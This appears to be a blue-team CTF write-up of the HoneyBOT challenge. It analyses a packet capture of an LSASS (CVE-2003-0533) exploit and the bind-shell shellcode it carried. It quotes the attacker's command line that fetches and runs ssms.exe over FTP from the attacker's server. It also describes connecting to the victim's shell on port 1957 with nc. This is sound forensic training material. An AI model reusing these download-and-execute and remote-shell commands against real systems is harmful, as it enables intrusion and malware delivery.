HoneyBOT
📅 Published: 2026-04-18 20:54 | 🔄 Last Updated: 2026-05-12 15:03
https://cyberdefenders.org/blueteam-ctf-challenges/honeybot/
Q1 What is the attacker's IP address?

using network miner:
192.150.11.111 [VIDCAM] (Linux) 98.114.205.102 [HOD] (Windows)
220 NzmxFtpd 0wns j0
Q2 What is the target's IP address?
192.150.11.111 [VIDCAM] (Linux)
Q3 Provide the country code for the attacker's IP address (a.k.a geo-location).
US

Q4 How many TCP sessions are present in the captured traffic?

5
Q5 How long did it take to perform the attack (in seconds)?
Statistics > Capture File Properties in Wireshark
Q6 Provide the CVE number of the exploited vulnerability.
filter: smb
Active Directory Setup, DsRoleUpgradeDownlevelServer

CVE-2003-0533 is a highly critical, remotely exploitable vulnerability in Microsoft Windows that became infamous for being the primary flaw exploited by the Sasser worm.
Exploitation Mechanism: Attackers can exploit this issue by sending a specially crafted malformed packet to the LSASS DCE/RPC endpoint (often accessible over TCP ports 139 and 445). This packet tricks the undocumented DsRolerUpgradeDownlevelServer function into attempting to create an excessively long debug log file, which overflows the buffer and allows arbitrary code execution.
CVE-2003-0533
Q7 Which protocol was used to carry over the exploit?
SMB
Q8 Which protocol did the attacker use to download additional malicious files to the target system?
i check the tcp stream
ftp
Q9 What is the name of the downloaded malware?
echo open 0.0.0.0 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe ssms.exe
Q10 The attacker's server was listening on a specific port. Provide the port number.
8884
Q11 When was the involved malware first submitted to VirusTotal for analysis? Format: YYYY-MM-DD

Start with MZ signature → obviously an executable
I download it and calculate the hash

2007-06-27
Q12 What is the key used to encode the shellcode?
Hacker phải dùng key mã hóa ở đây là xor để tránh bị EDR, EV phát hiện
scdbg -f shellcode.bin -s -1 -v
Process Environment Block (PEB). The PEB is a structure in Windows that contains information about the currently running process, including loaded modules, memory layout, and execution state. By traversing this structure, the shellcode can locate the base address of essential system libraries, such as kernel32.dll, which contains critical functions needed for execution.
The CVE-2003-0533 exploit buffer overflow vulnerability of lssass.exe using NOP sled (a sequence of 0x90)

I use cyberchef remove all the NOP sled manually, save the shellcode and use scdbg:
scdbg -f shellcode.bin /findsc

-
/findsc: Scans the entire file to locate potential starting points (offsets) for executable code. It identified the offset0x70f, which leads directly into a NOP (No-Operation) sled. -
GetProcAddress&LoadLibraryA: Shellcode cannot call functions directly like normal software does. It has to dynamically "ask" Windows to resolve the RAM addresses of essential functions likeCreateProcessAorbind. -
LoadLibraryA(ws2_32): It loads the Windows networking library (ws2_32.dll) to prepare for network communications. -
WSASocket: Creates a network socket. -
bind(port:1957): This is the smoking gun for Q13. The malware is instructing Windows to "reserve port 1957 exclusively for me." -
listen: Switches the socket into a listening state, ready and waiting for an incoming connection from the outside (the attacker). -
accept: Pauses execution and waits. When the hacker attempts to connect to port 1957, this function is triggered to accept the connection and let the attacker into the system. -
CreateProcessA( cmd, ): Immediately after a successfulaccept, it spawnscmd.exe. The key takeaway: Within the shellcode's instructions, the standard input/output streams (stdin/stdout) of thiscmd.exeprocess are redirected straight into the newly created network socket. -
The Result: The attacker simply needs to run the command
nc <victim_IP> 1957from their machine, and they will instantly be presented with an interactive command prompt (CMD) for the victim's machine. -
closesocket&ExitThread: Once the attacker disconnects, the shellcode closes the network connections and terminates the thread gracefully. This is done to avoid causing a system crash or leaving error logs that would attract the attention of network defenders.
then i use the scdbg -f shellcode.bin /findsc /v
scdbg to print out every single CPU instruction it executes step-by-step, rather than just summarizing the final API calls.
This is a classic shellcode technique called "JMP-CALL-POP" combined with an XOR decoding loop.

0x99
Q13 What is the port number the shellcode binds to?
The answer is shown in previous question
1957
Q14 The shellcode used a specific technique to determine its location in memory. What is the OS file being queried during this process?
kernel32.dll
When regular software (Chrome, Word) start, the Windows operating system carefully loads it into memory and hands it a “map” of where all the important system files are located
Shellcode, however, is injected forcefully and illegally into memory. It is Position-Independent Code (PIC), meaning it is dropped in completely blind - doesn’nt know where it is, and it doesn’t have a map of where Windows functions are
To do anything malicious, the shellcode must find the master list of Windows functions. In Windows, the holy grail for this is kernel32.dll, because it contains a function called GetProcAddress. Once the shellcode has GetProcAddress. It can ask windows to find the address of any other function it needs
- In 32-bit Windows, a special CPU register called
fspoints to a data structure holding information about the current thread. - Exactly at offset
0x30inside that structure is a pointer to the Process Environment Block (PEB). - The PEB is essentially the internal "map" that Windows gave to the victim process.
- The subsequent instructions (
mov eax, [eax+0xc],mov esi, [eax+0x14], etc.) show the shellcode opening that map, flipping to the "Loaded Modules" section (the LDR data structure), and reading the list of loaded DLLs. It loops through this list until it findskernel32.dll. mov esi, [eax+0x1c]: move toInInitializationOrderModuleList. the Shellcode will loop through this list until it findskernel32.dll.